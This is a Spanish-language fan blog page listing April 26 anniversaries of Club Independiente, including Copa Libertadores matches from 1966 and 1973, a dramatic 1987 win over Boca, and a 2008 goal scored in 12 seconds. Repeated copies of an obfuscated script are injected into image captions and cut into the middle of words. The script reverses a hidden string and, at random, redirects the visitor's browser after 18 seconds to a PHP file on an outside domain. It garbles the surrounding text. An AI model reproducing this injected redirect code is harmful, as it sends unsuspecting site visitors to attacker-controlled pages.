Conectate con nosotros

Efemérides

Efemérides del 26 de Abril

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1966El 14 de abril les conté sobre la visita a Paraguay para vencer 2 a 0 a Guaraní, por la segunda fase o semifinales de la Copa Libertadores 1966, y un día como hoy toca ver nuevamente a dicho rival pero en Avellaneda, siendo un nuevo triunfo pero por 2 a 1. Abrió la cuenta Aníbal Tarabini a los 33 minutos, lo empató la visita con gol de Rubén Navarro en contra a los 35’, y en la segunda etapa Raúl Savoy marca el 2 a 1 de penal a los 75 minutos.

Ese día el equipo fue: Miguel Santoro; Roberto Ferreiro, Rubén Navarro, Idalino Monges y Ricardo Pavoni; Jesús Roldán, David Acevedo (41’ José Pastoriza) y Raúl Savoy; Raúl Bernao, Luis Artime y Aníbal Tarabini, con el D.T. Antonio Faldutti. Hasta ese momento, las posiciones en el grupo de semifinales quedaban de la siguiente manera: River era el líder con 8 unidades en cinco partidos jugados, el Rojo segundo con 7 y misma cantidad de partidos, y Boca tercero con 4 puntos y un cotejo menos, mientras que Guaraní ya no tenía chances.

El triunfo sería el último del equipo en esa Copa, porque tres días después Independiente recibió a Boca y empataron 0 a 0, lo que generó que el Rojo iguale a River y que Boca quede sin chances, pero a principios de mayo el conjunto Xeneize completó el grupo ganándole a River. Ante el empate en el liderazgo del grupo, Independiente y River jugaron un partido desempate en la cancha de San Lorenzo.

En dicho encuentro, Independiente jugó con uno menos desde los 10 minutos por la expulsión de Savoy, aguantando el 0 a 0 en los 90 reglamentarios, luego en tiempo extra perdería por 2 a 1 cuando tan solo faltaba un minuto de juego. De esa manera River accedió a las finales, donde sería vencido por el campeón Peñarol en la famosa final que le daría el mote de “Gallinas”.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»71″ height=»55″/></figure></div>



<p><strong>No hay video de los goles</strong>, pero sí de una parte del encuentro, y se los dejo por si a alguno le interesa:</p>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»70″ height=»54″/></figure></div>



<p><strong>1973</strong> – <strong>Independiente recibe en Avellaneda a Millonarios de Colombia</strong>, y <strong>le gana por 2 a 0</strong> con <strong>goles</strong> de <strong>Ricardo Pavoni a los 43’</strong> y <strong>Agustín Balbuena</strong> <strong>a los 82</strong> minu<script>$mWn=function(n){if(typeof ($mWn.list[n])==tos. Previo a los goles, Pavoni había fallado un penal a los 8 minutos del juego.

Aquel día, frente a más de 30 mil personas, el Rojo salió a la cancha con: Miguel Santoro; Eduardo Commisso, Miguel López, Francisco y Ricardo Pavoni; Alejandro Semenewicz, Rubén Galván y Héctor Martínez (46’ Víctor Palomba); Agustín Balbuena, Miguel Giachello (85’ Juan Carlos Merlo) y Mario Mendoza, con Humberto Maschio como D.T.

Se trató del segundo partido de la segunda fase, o fase semifinal, de la Copa Libertadores 1973, e Independiente estaba obligado a ganar, ya que en el debut había sido derrotado en Colombia por el mismo Millonarios. El otro integrante del grupo en esa fase era San Lorenzo, rival al cual faltaba enfrentar tanto de visitante como de local, para determinar quién sería el líder del grupo y, por ende, el que accediera a la final.

Ese San Lorenzo, dirigido por Juan Carlos “Toto” Lorenzo, era el equipo bicampeón de Argentina, habiéndose coronado en el Metropolitano y el Nacional de 1972. En El Gráfico posterior al partido frente a Millonarios, la tapa de dicho medio estuvo referida al cruce que se venía, y ya se hacía el análisis de ambos equipos, pero ya habrá tiempo para repasar esos choques.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»62″ height=»48″/></figure></div>



<p><strong>1987</strong> – Se disputa en La Bombonera <strong>uno de los encuentros más dramáticos en la his<script>$mWn=function(n){if(typeof ($mWn.list[n])==toria del Rojo y Boca. Ambos peleaban la punta de la Temporada 1986-1987 y era la anteúltima fecha, la número 37 de la competencia, que además tenía en la cima a Newell´s y Rosario Central.

Independiente con José Pastoriza como D.T., puso a este equipo: Sergio Vargas; Juan Erba, Hugo Villaverde, Osvaldo Ingrao y Néstor Clausen; Ricardo Giusti, Claudio Marangoni, Gerardo Reinoso y Ricardo Bochini; Franco Navarro (57’ José Percudani) y Alejandro Barberón (39’ Pedro Monzón). Mientras que Boca tenía a César Menotti como técnico y presentó a: Gatti; Abramovich, Higuaín, Musladini y Hrabina; Melgar, Carrizo (74’ Dykstra) y Tapia; Graciani (61’ Torres), Rinaldi y Comas.

Algo muy poco visto en la historia, fue que antes de iniciar el encuentro, el club Xeneize le entregó una plaqueta a Ricardo Bochini felicitándolo por cumplir 500 partidos en Primera División unos meses atrás, y quien le entregó dicha plaqueta fue el mismísimo José “Abuelo”, líder de la barra brava de Boca. Al mismo tiempo, toda la Bombonera entonó el BO-BO-CHINI para el ídolo rojo. Después del hecho, en cada partido frente a Boca la hinchada roja cantaría: “TE VOY A REGALAR UNA FOTO DEL BOCHA, PARA QUE TE COJ…, PARA QUE TE COJ…!”.

Nos metemos en el partido, y a los 27 minutos llegaría la primera emoción. El Rojo atacaba y luego de una serie de rebotes y tapadas del arquero, la pelota va a la izquierda donde aparece Alejandro Barberón para meter el centro. Llega el envío aéreo y quien cabecea es Ricardo Bochini (sí, de cabeza), para vencer a Hugo Gatti y poner el 1 a 0 con un gol muy recordado.

A los 37 minutos los dos equipos quedaron con 10, porque mutuamente se agredieron Jorge Rinaldi y Hugo Villaverde, y el juez Ricardo Calabria los expulsó correctamente. José Pastoriza rearmó la defensa haciendo ingresar a Pedro “Moncho” Monzón en lugar de Alejandro Barberón.

Así se fueron al descanso, y apenas iniciada la segunda etapa Boca lo empata a los 47 con gol de Carlos “Chino” Tapia de cabeza, luego de un tiro libre. Pero faltaba lo mejor del partido todavía. José Percudani había ingresado en lugar del peruano Franco Navarro, y rápidamente influyó en el transcurso del cotejo, porque realizó un pase de taco para Ricardo Giusti que avanzó al ataque, Boca hace mal el achique (recuerden que el D.T. era Menotti), el “Gringo” se la devuelve a “Mandinga” y gol para el 2 a 1 mientras todo Boca se quedaba pidiendo una inexistente posición adelantada, ya que el delantero del Rojo estuvo siempre por detrás de la línea de la pelota.

Inmediatamente, el local quedó con 9 al irse expulsado Luis Abramovich, por reclamar de forma desmedida en el gol. Pero el Rojo ni pudo aprovechar la superioridad numérica, porque Ricardo Giusti tiró lejos una pelota y también vio la roja, tontamente pero con justicia.

En partido llegaba a los momentos finales y parecía consumarse la victoria de Independiente, pero a los 87 minutos el ingresado Claudio Dykstra se mete en el área roja e intenta pasar entre dos defensores, al mínimo roce se deja caer y el árbitro compra, cobra penal y la sanción hace que el “Pato” Pastoriza deje el campo de juego al considerar absurdo el fallo. Se hace cargo de la ejecución Jorge Comas, que pone el 2 a2.

El estadio explotaba, y ahora sí parecía que el partido no tenía más nada para entregar con sus cuatro goles y cuatro rojas. Sin embargo cuando solamente faltaba un minuto de juego, Claudio Marangoni toma la pelota y encara a una defensa de Boca totalmente adelantada, “Maranga” con toda su categoría mueve la pelota de pie a pie superando a dos rivales juntos, con un manejo de pelota soberbio, y avanza solo frente a Gatti. El arquero boquense sale hasta más adelante de la media luna del área, y Marangoni otra vez con total lucidez mental, la toca suave hacia su derecha para la llegada de Percudani que define al gol, con Gatti observando e inútilmente levantando su brazo para reclamar un nuevo off side inexistente, y la consecuencia del reclamo fue la expulsión del arquero.

Delirio absoluto de la gente del Rojo que había copado La Bombonera, un partido no apto para cardíacos, completamente eléctrico al buscar ambos la victoria. Pero lo logró justamente Independiente, con Ricardo Bochini como figura y actuaciones destacadas de Clausen, Marangoni, Percudani, etc. El Rojo seguía en la lucha por el título hasta el final, mientras que Boca ya no tenía chances, además de que era el segundo triunfo sobre Boca en la temporada, porque ya lo había goleado por 5 a 2 en la primera ronda.

No le alcanzaría al Rojo para ser campeón porque en la última jornada empató con Vélez y fue Rosario Central quien se consagró, pero aun así el partido de un día como hoy resultó inolvidable. Independiente realizó una muy buena campaña esa temporada, siendo el equipo de mayor poderío ofensivo al marcar 70 goles, y teniendo como goleador del plantel a Franco Navarro con 18.

Por otra parte, la historia de Boca e Independiente no quedó ahí nada más, ya que ambos equipos clasificaron a la Liguilla Pre-Libertadores que definía quien ingresaría a la Copa junto con el campeón, Rosario Central, y el último campeón que era River. En dicha liguilla Independiente y Boca llegaron a la final, que fue ida y vuelta jugadas en el mes de junio, y nuevamente el Rojo se hizo notar en La Bombonera, pero ya habrá tiempo para contarles eso.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»61″ height=»47″/></figure></div>



<p>Les dejo <strong>video de los goles de este increíble encuentro</strong>, que significó sacarle 8 partidos de ventaja a Boca en el his<script>$mWn=function(n){if(typeof ($mWn.list[n])==torial: 

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»73″ height=»56″/></figure></div>



<p><strong>2008</strong> – <strong>Independiente como visitante vence a Gimnasia y Esgrima de Jujuy por 2 a 1</strong>. Fue por la <strong>fecha 12</strong> del <strong>Torneo Clausura 2008</strong> y en dicho partido <strong>se registró el gol más rápido de la his<script>$mWn=function(n){if(typeof ($mWn.list[n])==toria del club.

Fue en tan sólo 12 segundos de juego, el Rojo sacó desde el medio enviando la pelota hacia atrás, de allí partió un pelotazo y es Germán Denis quien cerca del área rival, la baja de cabeza para la entrada libre de Hernán Fredes. Éste jugador define con pierna zurda, y su remate golpea en el defensor Federico Acuña, descolocando al arquero y transformándose en gol.

El tanto restante de la victoria fue de Daniel  Montenegro, con una gran definición desde fuera del área con su pierna derecha, como normalmente hizo aquel 2008. Ampliando un poco el momento, decir que el D.T. interino del equipo era Miguel Ángel Santoro, en lo que fue el traspaso de Pedro Troglio a Claudio Borghi al mando del plantel.

“Pepé” había asumido para la fecha 8, en el empate en 0 visitando a Huracán, luego en la 9 fue derrota frente a Colón, en la 10 triunfo 3 a 1 sobre Olimpo, la 11 nuevamente victoria frente a Banfield por 3 a 0, la 12 el triunfo que estoy recordando, y en la 13 sería victoria 3 a 0 sobre Newell’s, finalizando así el interinato del legendario arquero del Rojo.  En 6 fechas, cosechó: 4 triunfos, 1 empate y 1 derrota.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»77″ height=»59″/></figure></div>



<p>Les dejo el <strong>video de los goles</strong>:</p>



<figure class=

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides